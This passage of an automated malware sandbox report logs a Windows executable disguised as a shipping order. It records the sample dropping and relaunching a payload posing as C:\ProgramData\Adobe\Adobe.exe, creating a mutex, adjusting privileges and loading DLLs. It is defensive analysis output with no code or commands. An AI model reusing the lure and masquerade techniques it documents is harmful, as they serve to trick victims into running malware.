                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_00416AB7
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,3_2_0040E219
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,3_2_0041A63F
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_00419BC4
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.log
                    Source: C:\ProgramData\Adobe\Adobe.exeMutant created: NULL
                    Source: C:\ProgramData\Adobe\Adobe.exeMutant created: \Sessions\1\BaseNamedObjects\Adobe_Nov-3XE9WN
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeReversingLabs: Detection: 65%
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile read: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe "C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess created: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe "C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: unknownProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: unknownProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: unknownProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess created: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe "C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe" Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: uoct.pdbSHA2567B source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, Adobe.exe.3.dr
                    Source: Binary string: uoct.pdb source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, Adobe.exe.3.dr
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: 0xD7610664 [Mon Jul 3 10:54:28 2084 UTC]
